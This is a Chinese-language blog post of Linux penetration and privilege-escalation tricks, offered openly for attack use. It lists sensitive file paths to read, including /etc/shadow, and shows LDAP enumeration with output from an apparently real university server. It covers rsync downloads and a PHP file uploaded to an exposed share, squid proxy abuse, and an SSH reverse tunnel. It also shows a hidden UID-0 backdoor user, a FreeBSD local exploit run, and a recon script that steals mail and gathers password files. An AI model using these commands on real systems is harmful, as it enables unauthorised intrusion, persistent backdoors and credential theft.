最新消息:XAMPP默认安装之后是很不安全的,我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。

admin下的Linux 渗透与提权技巧

XAMPP案例 admin 998浏览 0评论

Linux 系统下的一些常见路径:
/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log

/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log

/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini

/usr/local/php4/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php5/lib/php.ini

/usr/local/php5/etc/php.ini

/usr/local/php5/php5.ini

/usr/local/apache/conf/php.ini

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache2/conf/php.ini

/etc/php4.4/fcgi/php.ini

/etc/php4/apache/php.ini

/etc/php4/apache2/php.ini

/etc/php5/apache/php.ini

/etc/php5/apache2/php.ini

/etc/php/php.ini

/etc/php/php4/php.ini

/etc/php/apache/php.ini

/etc/php/apache2/php.ini

/web/conf/php.ini

/usr/local/Zend/etc/php.ini

/opt/xampp/etc/php.ini

/var/local/www/conf/php.ini

/var/local/www/conf/httpd.conf

/etc/php/cgi/php.ini

/etc/php4/cgi/php.ini

/etc/php5/cgi/php.ini

/php5/php.ini

/php4/php.ini

/php/php.ini

/PHP/php.ini

/apache/php/php.ini

/xampp/apache/bin/php.ini

/xampp/apache/conf/httpd.conf

/NetServer/bin/stable/apache/php.ini

/home2/bin/stable/apache/php.ini

/home/bin/stable/apache/php.ini

/var/log/mysql/mysql-bin.log

/var/log/mysql.log

/var/log/mysqlderror.log

/var/log/mysql/mysql.log

/var/log/mysql/mysql-slow.log

/var/mysql.log

/var/lib/mysql/my.cnf

/usr/local/mysql/my.cnf

/usr/local/mysql/bin/mysql

/etc/mysql/my.cnf

/etc/my.cnf

/usr/local/cpanel/logs

/usr/local/cpanel/logs/stats_log

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/share/examples/php4/php.ini

/usr/local/share/examples/php/php.ini

/usr/local/tomcat5527/bin/version.sh

/usr/share/tomcat6/bin/startup.sh

/usr/tomcat6/bin/startup.sh

ldap 渗透技巧:

cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

查找管理员信息

匿名方式

ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

有密码形式

ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

查找10条用户记录

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战

cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

查找管理员信息

匿名方式

ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

有密码形式

ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

查找10条用户记录

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战

1、返回所有的属性

ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”

version: 1

dn: dc=ruc,dc=edu,dc=cn

dc: ruc

objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn

uid: manager

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: manager

cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

uid: superadmin

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: superadmin

cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn

uid: admin

objectClass: inetOrgPerson

objectClass: organizationalPerson

objectClass: person

objectClass: top

sn: admin

cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

uid: dcp_anonymous

objectClass: top

objectClass: person

objectClass: organizationalPerson

objectClass: inetOrgPerson

sn: dcp_anonymous

cn: dcp_anonymous

2、查看基类

bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3、查找

bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”

version: 1

dn:

objectClass: top

namingContexts: dc=ruc,dc=edu,dc=cn

supportedExtension: 2.16.840.1.113730.3.5.7

supportedExtension: 2.16.840.1.113730.3.5.8

supportedExtension: 1.3.6.1.4.1.4203.1.11.1

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

supportedExtension: 2.16.840.1.113730.3.5.3

supportedExtension: 2.16.840.1.113730.3.5.5

supportedExtension: 2.16.840.1.113730.3.5.6

supportedExtension: 2.16.840.1.113730.3.5.4

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

supportedExtension: 1.3.6.1.4.1.1466.20037

supportedExtension: 1.3.6.1.4.1.4203.1.11.3

supportedControl: 2.16.840.1.113730.3.4.2

supportedControl: 2.16.840.1.113730.3.4.3

supportedControl: 2.16.840.1.113730.3.4.4

supportedControl: 2.16.840.1.113730.3.4.5

supportedControl: 1.2.840.113556.1.4.473

supportedControl: 2.16.840.1.113730.3.4.9

supportedControl: 2.16.840.1.113730.3.4.16

supportedControl: 2.16.840.1.113730.3.4.15

supportedControl: 2.16.840.1.113730.3.4.17

supportedControl: 2.16.840.1.113730.3.4.19

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

supportedControl: 2.16.840.1.113730.3.4.14

supportedControl: 1.3.6.1.4.1.1466.29539.12

supportedControl: 2.16.840.1.113730.3.4.12

supportedControl: 2.16.840.1.113730.3.4.18

supportedControl: 2.16.840.1.113730.3.4.13

supportedSASLMechanisms: EXTERNAL

supportedSASLMechanisms: DIGEST-MD5

supportedLDAPVersion: 2

supportedLDAPVersion: 3

vendorName: Sun Microsystems, Inc.

vendorVersion: Sun-Java(tm)-System-Directory/6.2

dataversion: 020090516011411

netscapemdsuffix: cn=ldap://dc=webA:389

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

<strong> </strong>

NFS 渗透技巧:

列举IP

showmount -e ip

rsync渗透技巧:

1、查看rsync服务器上的列表

rsync 210.51.X.X::

finance

img_finance

auto

img_auto

html_cms

img_cms

ent_cms

ent_img

ceshi

res_img

res_img_c2

chip

chip_c2

ent_icms

games

gamesimg

media

mediaimg

fashion

res-fashion

res-fo

taobao-home

res-taobao-home

house

res-house

res-home

res-edu

res-ent

res-labs

res-news

res-phtv

res-media

home

edu

news

res-book

看相应的下级目录(注意一定要在目录后面添加上/)

rsync 210.51.X.X::htdocs_app/

rsync 210.51.X.X::auto/

rsync 210.51.X.X::edu/

2、下载rsync服务器上的配置文件

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3、向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt

squid渗透技巧:

nc -vv 91ri.org 80

GET HTTP://www.sina.com / HTTP/1.0

GET HTTP://WWW.sina.com:22 / HTTP/1.0

SSH端口转发:

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

joomla渗透小技巧:

确定版本

index.php?option=com_content&amp;view=article&amp;id=30:what-languages-are-supported-by-joomla-15&amp;catid=32:languages&amp;Itemid=47

重新设置密码

index.php?option=com_user&amp;view=reset&amp;layout=confirm

Linux添加UID为0的root用户:

useradd -o -u 0 nothack

freebsd本地提权:

[argp@julius ~]$ uname -rsi

* freebsd 7.3-RELEASE GENERIC

* [argp@julius ~]$ sysctl vfs.usermount

* vfs.usermount: 1

* [argp@julius ~]$ id

* uid=1001(argp) gid=1001(argp) groups=1001(argp)

* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

* [argp@julius ~]$ ./nfs_mount_ex

*

calling nmount()

tar 文件夹打包:

tar打包

tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除文件*.gif  排除目录 /xx/xx/*

alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除文件*.gif   排除目录 /xx/xx/*

系统信息收集:

for linux:

#!/bin/bash

echo #######geting sysinfo####

echo ######usage: ./getinfo.sh &gt;/tmp/sysinfo.txt

echo #######basic infomation##

cat /proc/meminfo

echo

cat /proc/cpuinfo

echo

rpm -qa 2&gt;/dev/null

######stole the mail……######

cp -a /var/mail /tmp/getmail 2&gt;/dev/null

echo ‘u’r id is’ `id`

echo ###atq&amp;crontab#####

atq

crontab -l

echo #####about var#####

set

echo #####about network###

####this is then point in pentest,but i am a new bird,so u need to add some in it

cat /etc/hosts

hostname

ipconfig -a

arp -v

echo ########user####

cat /etc/passwd|grep -i sh

echo ######service####

chkconfig –list

for i in {oracle,mysql,tomcat,samba,apache,ftp}

cat /etc/passwd|grep -i $i

done

locate passwd &gt;/tmp/password 2&gt;/dev/null

sleep 5

locate password &gt;&gt;/tmp/password 2&gt;/dev/null

sleep 5

locate conf &gt;/tmp/sysconfig 2&gt;dev/null

sleep 5

locate config &gt;&gt;/tmp/sysconfig 2&gt;/dev/null

sleep 5

###maybe can use “tree /”###

echo ##packing up#########

tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig

rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

希望本文对您有所帮助或启发。

转载请注明:XAMPP中文组官网 » admin下的Linux 渗透与提权技巧

您必须 登录 才能发表评论!